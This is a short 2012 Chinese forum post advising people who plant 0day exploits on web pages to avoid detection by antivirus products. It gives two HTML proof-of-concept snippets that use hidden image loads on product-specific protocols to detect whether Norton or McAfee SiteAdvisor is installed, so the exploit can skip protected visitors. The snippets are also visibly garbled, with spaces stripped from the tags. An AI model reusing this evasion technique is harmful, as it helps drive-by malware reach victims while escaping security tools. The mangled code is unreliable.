关于挂马检测对抗的一点思路

[复制链接]
查看255 | 回复0 | 2012-4-1 19:22:23 | 显示全部楼层 |阅读模式
很多人在挂0day时一不小心就被安全软件的检测的话,那么就绕着它走吧。
虽然可能打不中目标,但也比0day被抓了去要好。
 
比如下面的POC:
 
<html><body>
<divid=sHstyle='display:none'><imgsrc=&quot;symres:sb_nortoncertified.png&quot;onerror=&quot;alert('NortonnotInstalled.')&quot;onload=&quot;alert('NortonInstalled!')&quot;></img></div>
</body></html>
&nbsp;
&nbsp;
McAfee也是一样:
<html><body>
<divid=sHstyle='display:none'><imgsrc=&quot;sacore:green.gif&quot;onerror=&quot;alert('McAfeeSiteAdvisornotInstalled.')&quot;onload=&quot;alert('McAfeeSiteAdvisorInstalled!')&quot;></img></div>
</body></html>
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则